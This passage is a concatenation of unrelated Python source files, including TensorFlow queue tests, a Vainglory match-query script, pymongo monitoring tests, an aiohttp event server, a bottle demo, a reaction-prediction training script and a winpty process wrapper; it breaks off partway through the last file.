q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
request_data.py
|
import os
import time
from threading import Thread
from requests import HTTPError
from api import VaingloryApi
from flask_app import db
from models import Team
from process_data import process_batch_query
api_key = os.environ.get('API_KEY', None)
api = VaingloryApi(api_key)
class PlayerNotFound(Exception):
pass
def get_time():
return time.strftime("%Y-%m-%dT%H:%M%SZ")
def query_player(name, region):
try:
response = api.matches(region=region, limit=50, createdAtStart="2017-03-01T00:00:00Z",
createdAtEnd=get_time(), sort="-createdAt", player=name)
except HTTPError as e:
raise PlayerNotFound(e.message)
player = [i for i in response["included"] if i["type"] == "player" and i["attributes"]["name"] == name]
if len(player) == 1:
return player[0]
else:
raise PlayerNotFound("Player {0} not found for region {1}".format(name, region))
def query_team(team_id):
# shiqan = "2537169e-2619-11e5-91a4-06eb725f8a76"
# shanlom = "78a83898-7193-11e4-9389-062d0b175276"
# kanonmara = "d49ff1fe-8ede-11e5-8bec-06f4ee369f53"
# maestro = "786c586c-8fb7-11e5-a1ef-068789513eb5"
team = db.session.query(Team).get(team_id)
for player in team._members:
response = api.matches(region="eu", createdAtStart="2017-03-01T00:00:00Z",
createdAtEnd=get_time(), sort="-createdAt", gameMode="ranked",
playerId="{0}".format(player.id))
print(len(response['data']))
process_batch_query(response)
def process_id(player_id, gamemode="ranked"):
return api.matches(region="eu", createdAtStart="2017-03-01T00:00:00Z",
createdAtEnd=get_time(), sort="-createdAt", gameMode=gamemode, playerId="{0}".format(player_id))
def process_range(id_range, store=None, gamemode="ranked"):
if store is None:
store = {}
for id in id_range:
result = process_id(id, gamemode)
process_batch_query(result)
store[id] = True
return store
def threaded_process_range(nthreads, id_range, gamemode):
"""process the id range in a specified number of threads"""
store = {}
threads = []
# create the threads
for i in range(nthreads):
ids = id_range[i::nthreads]
t = Thread(target=process_range, args=(ids, store, gamemode))
threads.append(t)
# start the threads
[t.start() for t in threads]
# wait for the threads to finish
[t.join() for t in threads]
return store
if __name__ == "__main__":
# query_player("Shiqan", "eu")
query_team("cca544dd-8fb9-4640-97fa-d20aee017639")
|
test_discovery_and_monitoring.py
|
# Copyright 2014-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the topology module."""
import os
import sys
import threading
import time
sys.path[0:0] = [""]
from bson import json_util, Timestamp
from pymongo import (common,
monitoring)
from pymongo.errors import (AutoReconnect,
ConfigurationError,
NetworkTimeout,
NotMasterError,
OperationFailure)
from pymongo.helpers import _check_command_response
from pymongo.ismaster import IsMaster
from pymongo.server_description import ServerDescription, SERVER_TYPE
from pymongo.settings import TopologySettings
from pymongo.topology import Topology, _ErrorContext
from pymongo.topology_description import TOPOLOGY_TYPE
from pymongo.uri_parser import parse_uri
from test import unittest, IntegrationTest
from test.utils import (assertion_context,
cdecimal_patched,
CMAPListener,
client_context,
Barrier,
get_pool,
HeartbeatEventListener,
server_name_to_type,
rs_or_single_client,
single_client,
TestCreator,
wait_until)
from test.utils_spec_runner import SpecRunner, SpecRunnerThread
from test.pymongo_mocks import DummyMonitor
# Location of JSON test specifications.
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'discovery_and_monitoring')
def create_mock_topology(uri, monitor_class=DummyMonitor):
parsed_uri = parse_uri(uri)
replica_set_name = None
direct_connection = None
if 'replicaset' in parsed_uri['options']:
replica_set_name = parsed_uri['options']['replicaset']
if 'directConnection' in parsed_uri['options']:
direct_connection = parsed_uri['options']['directConnection']
topology_settings = TopologySettings(
parsed_uri['nodelist'],
replica_set_name=replica_set_name,
monitor_class=monitor_class,
direct_connection=direct_connection)
c = Topology(topology_settings)
c.open()
return c
def got_ismaster(topology, server_address, ismaster_response):
server_description = ServerDescription(
server_address, IsMaster(ismaster_response), 0)
topology.on_change(server_description)
def got_app_error(topology, app_error):
server_address = common.partition_node(app_error['address'])
server = topology.get_server_by_address(server_address)
error_type = app_error['type']
generation = app_error.get('generation', server.pool.generation)
when = app_error['when']
max_wire_version = app_error['maxWireVersion']
# XXX: We could get better test coverage by mocking the errors on the
# Pool/SocketInfo.
try:
if error_type == 'command':
_check_command_response(app_error['response'], max_wire_version)
elif error_type == 'network':
raise AutoReconnect('mock non-timeout network error')
elif error_type == 'timeout':
raise NetworkTimeout('mock network timeout error')
else:
raise AssertionError('unknown error type: %s' % (error_type,))
assert False
except (AutoReconnect, NotMasterError, OperationFailure) as e:
if when == 'beforeHandshakeCompletes':
completed_handshake = False
elif when == 'afterHandshakeCompletes':
completed_handshake = True
else:
assert False, 'Unknown when field %s' % (when,)
topology.handle_error(
server_address, _ErrorContext(e, max_wire_version, generation,
completed_handshake))
def get_type(topology, hostname):
description = topology.get_server_by_address((hostname, 27017)).description
return description.server_type
class TestAllScenarios(unittest.TestCase):
pass
def topology_type_name(topology_type):
return TOPOLOGY_TYPE._fields[topology_type]
def server_type_name(server_type):
return SERVER_TYPE._fields[server_type]
def check_outcome(self, topology, outcome):
expected_servers = outcome['servers']
# Check weak equality before proceeding.
self.assertEqual(
len(topology.description.server_descriptions()),
len(expected_servers))
if outcome.get('compatible') is False:
with self.assertRaises(ConfigurationError):
topology.description.check_compatible()
else:
# No error.
topology.description.check_compatible()
# Since lengths are equal, every actual server must have a corresponding
# expected server.
for expected_server_address, expected_server in expected_servers.items():
node = common.partition_node(expected_server_address)
self.assertTrue(topology.has_server(node))
actual_server = topology.get_server_by_address(node)
actual_server_description = actual_server.description
expected_server_type = server_name_to_type(expected_server['type'])
self.assertEqual(
server_type_name(expected_server_type),
server_type_name(actual_server_description.server_type))
self.assertEqual(
expected_server.get('setName'),
actual_server_description.replica_set_name)
self.assertEqual(
expected_server.get('setVersion'),
actual_server_description.set_version)
self.assertEqual(
expected_server.get('electionId'),
actual_server_description.election_id)
self.assertEqual(
expected_server.get('topologyVersion'),
actual_server_description.topology_version)
expected_pool = expected_server.get('pool')
if expected_pool:
self.assertEqual(
expected_pool.get('generation'),
actual_server.pool.generation)
self.assertEqual(outcome['setName'], topology.description.replica_set_name)
self.assertEqual(outcome.get('logicalSessionTimeoutMinutes'),
topology.description.logical_session_timeout_minutes)
expected_topology_type = getattr(TOPOLOGY_TYPE, outcome['topologyType'])
self.assertEqual(topology_type_name(expected_topology_type),
topology_type_name(topology.description.topology_type))
def create_test(scenario_def):
def run_scenario(self):
c = create_mock_topology(scenario_def['uri'])
for i, phase in enumerate(scenario_def['phases']):
# Including the phase description makes failures easier to debug.
description = phase.get('description', str(i))
with assertion_context('phase: %s' % (description,)):
for response in phase.get('responses', []):
got_ismaster(
c, common.partition_node(response[0]), response[1])
for app_error in phase.get('applicationErrors', []):
got_app_error(c, app_error)
check_outcome(self, c, phase['outcome'])
return run_scenario
def create_tests():
for dirpath, _, filenames in os.walk(_TEST_PATH):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = json_util.loads(scenario_stream.read())
# Construct test from scenario.
new_test = create_test(scenario_def)
test_name = 'test_%s_%s' % (
dirname, os.path.splitext(filename)[0])
new_test.__name__ = test_name
setattr(TestAllScenarios, new_test.__name__, new_test)
create_tests()
class TestClusterTimeComparison(unittest.TestCase):
def test_cluster_time_comparison(self):
t = create_mock_topology('mongodb://host')
def send_cluster_time(time, inc, should_update):
old = t.max_cluster_time()
new = {'clusterTime': Timestamp(time, inc)}
got_ismaster(t,
('host', 27017),
{'ok': 1,
'minWireVersion': 0,
'maxWireVersion': 6,
'$clusterTime': new})
actual = t.max_cluster_time()
if should_update:
self.assertEqual(actual, new)
else:
self.assertEqual(actual, old)
send_cluster_time(0, 1, True)
send_cluster_time(2, 2, True)
send_cluster_time(2, 1, False)
send_cluster_time(1, 3, False)
send_cluster_time(2, 3, True)
class TestIgnoreStaleErrors(IntegrationTest):
def test_ignore_stale_connection_errors(self):
N_THREADS = 5
barrier = Barrier(N_THREADS, timeout=30)
client = rs_or_single_client(minPoolSize=N_THREADS)
self.addCleanup(client.close)
# Wait for initial discovery.
client.admin.command('ping')
pool = get_pool(client)
starting_generation = pool.generation
wait_until(lambda: len(pool.sockets) == N_THREADS, 'created sockets')
def mock_command(*args, **kwargs):
# Synchronize all threads to ensure they use the same generation.
barrier.wait()
raise AutoReconnect('mock SocketInfo.command error')
for sock in pool.sockets:
sock.command = mock_command
def insert_command(i):
try:
client.test.command('insert', 'test', documents=[{'i': i}])
except AutoReconnect as exc:
pass
threads = []
for i in range(N_THREADS):
threads.append(threading.Thread(target=insert_command, args=(i,)))
for t in threads:
t.start()
for t in threads:
t.join()
# Expect a single pool reset for the network error
self.assertEqual(starting_generation+1, pool.generation)
# Server should be selectable.
client.admin.command('ping')
class CMAPHeartbeatListener(HeartbeatEventListener, CMAPListener):
pass
class TestPoolManagement(IntegrationTest):
@client_context.require_failCommand_appName
def test_pool_unpause(self):
# This test implements the prose test "Connection Pool Management"
listener = CMAPHeartbeatListener()
client = single_client(appName="SDAMPoolManagementTest",
heartbeatFrequencyMS=500,
event_listeners=[listener])
self.addCleanup(client.close)
# Assert that ConnectionPoolReadyEvent occurs after the first
# ServerHeartbeatSucceededEvent.
listener.wait_for_event(monitoring.PoolReadyEvent, 1)
pool_ready = listener.events_by_type(monitoring.PoolReadyEvent)[0]
hb_succeeded = listener.events_by_type(
monitoring.ServerHeartbeatSucceededEvent)[0]
self.assertGreater(
listener.events.index(pool_ready),
listener.events.index(hb_succeeded))
listener.reset()
fail_ismaster = {
'mode': {'times': 2},
'data': {
'failCommands': ['isMaster'],
'errorCode': 1234,
'appName': 'SDAMPoolManagementTest',
},
}
with self.fail_point(fail_ismaster):
listener.wait_for_event(monitoring.ServerHeartbeatFailedEvent, 1)
listener.wait_for_event(monitoring.PoolClearedEvent, 1)
listener.wait_for_event(
monitoring.ServerHeartbeatSucceededEvent, 1)
listener.wait_for_event(monitoring.PoolReadyEvent, 1)
class TestIntegration(SpecRunner):
# Location of JSON test specifications.
TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'discovery_and_monitoring_integration')
def _event_count(self, event):
if event == 'ServerMarkedUnknownEvent':
def marked_unknown(e):
return (isinstance(e, monitoring.ServerDescriptionChangedEvent)
and not e.new_description.is_server_type_known)
return len(self.server_listener.matching(marked_unknown))
# Only support CMAP events for now.
self.assertTrue(event.startswith('Pool') or event.startswith('Conn'))
event_type = getattr(monitoring, event)
return self.pool_listener.event_count(event_type)
def maybe_skip_scenario(self, test):
"""Override to skip threaded tests when cdecimal is installed on 2.7
"""
super(TestIntegration, self).maybe_skip_scenario(test)
# PYTHON-2332
ops = [op['name'] for op in test['operations']]
if cdecimal_patched() and 'startThread' in ops:
raise unittest.SkipTest('PYTHON-2332 test fails with cdecimal')
def assert_event_count(self, event, count):
"""Run the assertEventCount test operation.
Assert the given event was published exactly `count` times.
"""
self.assertEqual(self._event_count(event), count,
'expected %s not %r' % (count, event))
def wait_for_event(self, event, count):
"""Run the waitForEvent test operation.
Wait for a number of events to be published, or fail.
"""
wait_until(lambda: self._event_count(event) >= count,
'find %s %s event(s)' % (count, event))
def configure_fail_point(self, fail_point):
"""Run the configureFailPoint test operation.
"""
self.set_fail_point(fail_point)
self.addCleanup(self.set_fail_point, {
'configureFailPoint': fail_point['configureFailPoint'],
'mode': 'off'})
def run_admin_command(self, command, **kwargs):
"""Run the runAdminCommand test operation.
"""
self.client.admin.command(command, **kwargs)
def record_primary(self):
"""Run the recordPrimary test operation.
"""
self._previous_primary = self.scenario_client.primary
def wait_for_primary_change(self, timeout_ms):
"""Run the waitForPrimaryChange test operation.
"""
def primary_changed():
primary = self.scenario_client.primary
if primary is None:
return False
return primary != self._previous_primary
timeout = timeout_ms/1000.0
wait_until(primary_changed, 'change primary', timeout=timeout)
def wait(self, ms):
"""Run the "wait" test operation.
"""
time.sleep(ms/1000.0)
def start_thread(self, name):
"""Run the 'startThread' thread operation."""
thread = SpecRunnerThread(name)
thread.start()
self.targets[name] = thread
def run_on_thread(self, sessions, collection, name, operation):
"""Run the 'runOnThread' operation."""
thread = self.targets[name]
thread.schedule(lambda: self._run_op(
sessions, collection, operation, False))
def wait_for_thread(self, name):
"""Run the 'waitForThread' operation."""
thread = self.targets[name]
thread.stop()
thread.join(60)
if thread.exc:
raise thread.exc
self.assertFalse(
thread.is_alive(), 'Thread %s is still running' % (name,))
def create_spec_test(scenario_def, test, name):
@client_context.require_test_commands
def run_scenario(self):
self.run_scenario(scenario_def, test)
return run_scenario
test_creator = TestCreator(create_spec_test, TestIntegration, TestIntegration.TEST_PATH)
test_creator.create_tests()
if __name__ == "__main__":
unittest.main()
|
server.py
|
import asyncio
import json
import os
from multiprocessing import Process
from aiohttp import web
from aiohttp_sse import sse_response
from pncl import STATIC_DIR
class Server:
def __init__(self, port=8080, host='0.0.0.0', events_per_second=1):
"""
Creates the backend server.
:param port: port on which aiohttp listens for requests.
:param host: host on which to deploy the aiohttp app.
:param events_per_second: how many times per second to check for new SSE
event requests.
"""
# Config
self.port = port
self.host = host
self.events_per_second = events_per_second
# Multiprocessing
self._p = None
self._event_queue = None
self._config_queue = None
self._config = None
# App
self._app = web.Application()
self._app.add_routes([
web.get('/config', self._get_config), # Endpoint for getting config
web.get('/event', self._event), # Endpoint for EventSource
web.get('/', self._index), # Called by View to get index
web.static('/', STATIC_DIR), # Serves static files (.js, .png, .css, etc)
])
def _main(self, event_queue, config_queue):
"""
Main runner for the backend.
"""
self._event_queue = event_queue
self._config_queue = config_queue
web.run_app(self._app, host=self.host, port=self.port)
async def _index(self, request):
"""
Callback for GET on /
"""
return web.FileResponse(os.path.join(STATIC_DIR, 'index.html'))
async def _get_config(self, request):
"""
Calback for GET on /config
"""
return web.Response(text=self._config)
async def _event(self, request):
"""
Callback for SSE GET on /event
"""
loop = request.app.loop
async with sse_response(request) as resp:
while True:
while True:
try:
event = self._event_queue.get(block=False)
await resp.send(event)
except:
break
try:
new_config = self._config_queue.get(block=False)
if new_config:
self._config = new_config
except:
pass
data = json.dumps('NOP')
await resp.send(data)
await asyncio.sleep(1 / self.events_per_second, loop=loop)
def start(self, event_queue, config_queue):
"""
Starts the backend server.
:param event_queue: multiprocessing.Manager.Queue object
:param config_queue: multiprocessing.Manager.Queue object
"""
self._p = Process(target=self._main, args=(event_queue, config_queue))
self._p.start()
def stop(self):
"""
Kills the backend server.
"""
print("Shutting down Pencil backend")
self._p.terminate()
def get_endpoint(self, name=None):
"""
Returns full http path for the given endpoint.
:param name: string (if None, returns path for /)
"""
return 'http://{}:{}/{}'.format(self.host, self.port, name if name else '')
|
demo.py
|
"""Templates Demo
"""
import argparse
import threading
import time
import webbrowser
try:
from bottle import get, run
except ImportError:
print('''\
Error: Templates demo requires the "bottle" web framework.
Install the "bottle" package using:
$ python3 -m pip install bottle
Then try executing the demo again.''')
exit(1)
from templates import HTMLTemplate
from templates.bootstrap import Starter, Jumbotron
class Index(HTMLTemplate):
def body(self):
with self.tag('h1'):
self.add('Python Templates')
with self.tag('ul'):
with self.tag('li'):
with self.tag('a', attrs={'href': '/starter/'}):
self.add('Bootstrap Starter')
with self.tag('li'):
with self.tag('a', attrs={'href': '/jumbotron/'}):
self.add('Bootstrap Jumbotron')
@get('/')
def index():
doc = Index()
return doc.format()
@get('/starter/')
def starter():
doc = Starter()
return doc.format()
@get('/jumbotron/')
def jumbotron():
doc = Jumbotron()
return doc.format()
def launch(host, port):
time.sleep(1)
webbrowser.open(f'http://{host}:{port}/')
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--no-launch', dest='launch', action='store_false')
parser.add_argument('--host', default='localhost')
parser.add_argument('--port', default=5050, type=int)
parser.add_argument('--reload', action='store_true')
parser.add_argument('--debug', action='store_true')
args = parser.parse_args()
if args.launch:
thread = threading.Thread(target=launch, args=(args.host, args.port))
thread.start()
run(host=args.host, port=args.port, reloader=args.reload, debug=args.debug)
if __name__ == '__main__':
main()
|
nntrain.py
|
import tensorflow as tf
from utils.nn import linearND, linear
from mol_graph import atom_fdim as adim, bond_fdim as bdim, max_nb, smiles2graph
from models import *
import math, sys, random
from optparse import OptionParser
import threading
parser = OptionParser()
parser.add_option("-t", "--train", dest="train_path")
parser.add_option("-p", "--cand", dest="cand_path", default=None)
parser.add_option("-b", "--batch", dest="batch_size", default=4)
parser.add_option("-c", "--ncore", dest="core_size", default=10)
parser.add_option("-a", "--ncand", dest="cand_size", default=500)
parser.add_option("-m", "--save_dir", dest="save_path")
parser.add_option("-w", "--hidden", dest="hidden_size", default=100)
parser.add_option("-d", "--depth", dest="depth", default=1)
parser.add_option("-n", "--max_norm", dest="max_norm", default=50.0)
opts,args = parser.parse_args()
hidden_size = int(opts.hidden_size)
depth = int(opts.depth)
core_size = int(opts.core_size)
cutoff = int(opts.cand_size)
max_norm = float(opts.max_norm)
batch_size = int(opts.batch_size)
session = tf.Session()
_input_atom = tf.placeholder(tf.float32, [None, None, adim])
_input_bond = tf.placeholder(tf.float32, [None, None, bdim])
_atom_graph = tf.placeholder(tf.int32, [None, None, max_nb, 2])
_bond_graph = tf.placeholder(tf.int32, [None, None, max_nb, 2])
_num_nbs = tf.placeholder(tf.int32, [None, None])
_label = tf.placeholder(tf.int32, [None])
_src_holder = [_input_atom, _input_bond, _atom_graph, _bond_graph, _num_nbs, _label]
q = tf.FIFOQueue(100, [tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.int32])
enqueue = q.enqueue(_src_holder)
input_atom, input_bond, atom_graph, bond_graph, num_nbs, label = q.dequeue()
input_atom.set_shape([None, None, adim])
input_bond.set_shape([None, None, bdim])
atom_graph.set_shape([None, None, max_nb, 2])
bond_graph.set_shape([None, None, max_nb, 2])
num_nbs.set_shape([None, None])
label.set_shape([None])
graph_inputs = (input_atom, input_bond, atom_graph, bond_graph, num_nbs)
with tf.variable_scope("mol_encoder"):
fp_all_atoms = rcnn_wl_only(graph_inputs, hidden_size=hidden_size, depth=depth)
reactant = fp_all_atoms[0:1,:]
candidates = fp_all_atoms[1:,:]
candidates = candidates - reactant
candidates = tf.concat(0, [reactant, candidates])
with tf.variable_scope("diff_encoder"):
reaction_fp = wl_diff_net(graph_inputs, candidates, hidden_size=hidden_size, depth=1)
reaction_fp = reaction_fp[1:]
reaction_fp = tf.nn.relu(linear(reaction_fp, hidden_size, "rex_hidden"))
score = tf.squeeze(linear(reaction_fp, 1, "score"), [1])
loss = tf.nn.softmax_cross_entropy_with_logits(score, label)
pred = tf.argmax(score, 0)
_lr = tf.placeholder(tf.float32, [])
optimizer = tf.train.AdamOptimizer(learning_rate=_lr)
tvs = tf.trainable_variables()
param_norm = tf.global_norm(tvs)
grads_and_vars = optimizer.compute_gradients(loss, tvs)
grads, var = zip(*grads_and_vars)
grad_norm = tf.global_norm(grads)
new_grads, _ = tf.clip_by_global_norm(grads, max_norm)
accum_grads = [tf.Variable(tf.zeros(v.get_shape().as_list()), trainable=False) for v in tvs]
zero_ops = [v.assign(tf.zeros(v.get_shape().as_list())) for v in accum_grads]
accum_ops = [accum_grads[i].assign_add(grad) for i, grad in enumerate(new_grads)]
grads_and_vars = zip(accum_grads, var)
backprop = optimizer.apply_gradients(grads_and_vars)
tf.global_variables_initializer().run(session=session)
size_func = lambda v: reduce(lambda x, y: x*y, v.get_shape().as_list())
n = sum(size_func(v) for v in tf.trainable_variables())
print "Model size: %dK" % (n/1000,)
def count(s):
c = 0
for i in xrange(len(s)):
if s[i] == ':':
c += 1
return c
def read_data(coord):
data = []
train_f = open(opts.train_path, 'r')
cand_f = open(opts.cand_path, 'r')
for line in train_f:
r,e = line.strip("\r\n ").split()
cand = cand_f.readline()
cbonds = []
for b in e.split(';'):
x,y = b.split('-')
x,y = int(x)-1,int(y)-1
cbonds.append((x,y))
sbonds = set(cbonds)
for b in cand.strip("\r\n ").split():
x,y = b.split('-')
x,y = int(x)-1,int(y)-1
if (x,y) not in sbonds:
cbonds.append((x,y))
data.append((r,cbonds))
random.shuffle(data)
data_len = len(data)
it = 0
while True:
reaction, cand_bonds = data[it]
cand_bonds = cand_bonds[:core_size]
it = (it + 1) % data_len
r,_,p = reaction.split('>')
n = count(r)
if n <= 2 or n > 100: continue
src_tuple,_ = smiles2graph(r, p, cand_bonds, cutoff=cutoff)
feed_map = {x:y for x,y in zip(_src_holder, src_tuple)}
session.run(enqueue, feed_dict=feed_map)
coord.request_stop()
coord = tf.train.Coordinator()
t = threading.Thread(target=read_data, args=(coord,))
t.start()
saver = tf.train.Saver()
it, sum_acc, sum_err, sum_gnorm = 0, 0.0, 0.0, 0.0
lr = 0.001
try:
while not coord.should_stop():
it += batch_size
session.run(zero_ops)
for i in xrange(batch_size):
ans = session.run(accum_ops + [pred])
if ans[-1] != 0:
sum_err += 1.0
_, pnorm, gnorm = session.run([backprop, param_norm, grad_norm], feed_dict={_lr:lr})
sum_gnorm += gnorm
if it % 200 == 0 and it > 0:
print "Training Error: %.4f, Param Norm: %.2f, Grad Norm: %.2f" % (sum_err / 200, pnorm, sum_gnorm / 200 * batch_size)
sys.stdout.flush()
sum_err, sum_gnorm = 0.0, 0.0
if it % 40000 == 0 and it > 0:
saver.save(session, opts.save_path + "/model.ckpt-%d" % it)
lr *= 0.9
print "Learning Rate: %.6f" % lr
except Exception as e:
print e
coord.request_stop(e)
finally:
saver.save(session, opts.save_path + "/model.final")
coord.request_stop()
coord.join([t])
|
ptyprocess.py
|
# -*- coding: utf-8 -*-
# Standard library imports
import codecs
import os
import shlex
import signal
import socket
import subprocess
import threading
import time
# Local imports
from .winpty_wrapper import PTY, PY2
try:
from shutil import which
except ImportError:
from backports.shutil_which import which
class PtyProcess(object):
"""This class represents a process running in a pseudoterminal.
The main constructor is the :meth:`spawn` classmethod.
"""
def __init__(self, pty):
assert isinstance(pty, PTY)
self.pty = pty
self.pid = pty.pid
self.closed = False
self.flag_eof = False
self.decoder = codecs.getincrementaldecoder('utf-8')(errors='strict')
# Used by terminate() to give kernel time to update process status.
# Time in seconds.
self.delayafterterminate = 0.1
# Used by close() to give kernel time to update process status.
# Time in seconds.
self.delayafterclose = 0.1
# Set up our file reader sockets.
self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
address = _get_address()
self._server.bind(address)
self._server.listen(1)
# Read from the pty in a thread.
self._thread = threading.Thread(
target=_read_in_thread, args=(address, self.pty)
)
self._thread.setDaemon(True)
self._thread.start()
self.fileobj, _ = self._server.accept()
self.fd = self.fileobj.fileno()
@classmethod
def spawn(cls, argv, cwd=None, env=None, dimensions=(24, 80)):
"""Start the given command in a child process in a pseudo terminal.
This does all the setting up the pty, and returns an instance of
PtyProcess.
Dimensions of the psuedoterminal used for the subprocess can be
specified as a tuple (rows, cols), or the default (24, 80) will be
used.
"""
if isinstance(argv, str):
argv = shlex.split(argv, posix=False)
if not isinstance(argv, (list, tuple)):
raise TypeError("Expected a list or tuple for argv, got %r" % argv)
# Shallow copy of argv so we can modify it
argv = argv[:]
command = argv[0]
env = env or os.environ
path = env.get('PATH', os.defpath)
command_with_path = which(command, path=path)
if command_with_path is None:
raise FileNotFoundError(
'The command was not found or was not ' +
'executable: %s.' % command
)
command = command_with_path
argv[0] = command
cmdline = ' ' + subprocess.list2cmdline(argv[1:])
cwd = cwd or os.getcwd()
proc = PTY(dimensions[1], dimensions[0])
# Create the environemnt string.
envStrs = []
for (key, value) in env.items():
envStrs.append('%s=%s' % (key, value))
env = '\0'.join(envStrs) + '\0'
if PY2:
command = _unicode(command)
cwd = _unicode(cwd)
cmdline = _unicode(cmdline)
env = _unicode(env)
if len(argv) == 1:
proc.spawn(command, cwd=cwd, env=env)
else:
proc.spawn(command, cwd=cwd, env=env, cmdline=cmdline)
inst = cls(proc)
inst._winsize = dimensions
# Set some informational attributes
inst.argv = argv
if env is not None:
inst.env = env
if cwd is not None:
inst.launch_dir = cwd
return inst
@property
def exitstatus(self):
"""The exit status of the process.
"""
return self.pty.exitstatus
def fileno(self):
"""This returns the file descriptor of the pty for the child.
"""
return self.fd
def close(self, force=False):
"""This closes the connection with the child application. Note that
calling close() more than once is valid. This emulates standard Python
behavior with files. Set force to True if you want to make sure that
the child is terminated (SIGKILL is sent if the child ignores
SIGINT)."""
if not self.closed:
self.pty.close()
self.fileobj.close()
self._server.close()
# Give kernel time to update process status.
time.sleep(self.delayafterclose)
if self.isalive():
if not self.terminate(force):
raise IOError('Could not terminate the child.')
self.fd = -1
self.closed = True
del self.pty
self.pty = None
def __del__(self):
"""This makes sure that no system resources are left open. Python only
garbage collects Python objects. OS file descriptors are not Python
objects, so they must be handled explicitly. If the child file
descriptor was opened outside of this class (passed to the constructor)
then this does not close it.
"""
# It is possible for __del__ methods to execute during the
# teardown of the Python VM itself. Thus self.close() may
# trigger an exception because os.close may be None.
try:
self.close()
except Exception:
pass
def flush(self):
"""This does nothing. It is here to support the interface for a
File-like object. """
pass
def isatty(self):
"""This returns True if the file descriptor is open and connected to a
tty(-like) device, else False."""
return self.isalive()
def read(self, size=1024):
"""Read and return at most ``size`` characters from the pty.
Can block if there is nothing to read. Raises :exc:`EOFError` if the
terminal was closed.
"""
data = self.fileobj.recv(size)
if not data:
self.flag_eof = True
raise EOFError('Pty is closed')
return self.decoder.decode(data, final=False)
def readline(self):
"""Read one line from the pseudoterminal as bytes.
